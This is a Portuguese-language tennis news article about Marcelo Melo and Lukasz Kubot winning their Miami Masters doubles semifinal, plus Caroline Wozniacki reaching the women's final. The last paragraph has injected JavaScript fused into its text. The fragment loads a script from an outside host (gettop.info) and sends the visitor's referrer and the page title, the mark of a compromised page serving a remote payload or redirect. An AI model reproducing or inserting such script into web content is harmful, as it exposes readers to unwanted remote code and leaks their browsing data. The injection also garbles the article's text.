Dupla de Marcelo Melo e polonês Kubot está na final nos EUA

Melo pode ser o primeiro brasileiro a faturar o título nas duplas em Miami. Foto: ATP/divulgação

O Brasil terá um representante em uma das finais do Masters 1000 de Miami. Nesta quinta-feira, em duelo das semifinais das duplas masculinas, o brasileiro Marcelo Melo e o polonês Lukasz Kubot enfrentaram o norte-americano Brian Baker e o canadense Daniel Nestor, e conseguiram se sobressair ao vencer por 2 a 0, com parciais de 6/4 e 6/3. O jogo teve 1h24 de duração.

Com a vitória, Marcelo Melo e Lukasz Kubot garantiram vaga na final e esperam agora o vencedor da outra semifinal, que será disputada entre os norte-americanos Nicholas Monroe e Jack Sock e a dupla formada pelos também norte-americanos Bob Bryan e Mike Bryan.

 

A classificação proporcionou a Marcelo Melo um grande feito. A última e única vez que um brasileiro havia avançado para uma final das duplas masculinas no Masters 1000 de Miami havia sido em 1990, quando Cássio Motta e o alemão Boris Becker decidiram o título, mas perderam para os norte-americanos Rick Leach e Jim Pugh.

Wozniacki na decisão – Em outro duelo realizado na tarde desta quinta-feira, no simples feminino, a dinamarquesa Caroline Wozniacki conseguiu a virada sobre a tcheca Karolina Pliskova e garantiu vaga na final ao vencer por 2 sets a 1, com parciais de 5/7, 6/1 e 6/1, em jogo com 2h17 de duração.

Com a vitória, Wozniacki segue em busca de um inédito título do Masters 1000 de Miami. A adversária da dinamarquesa sairá do confronto entre a norte-americana Venus Williams e a britânica Johanna Konta.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário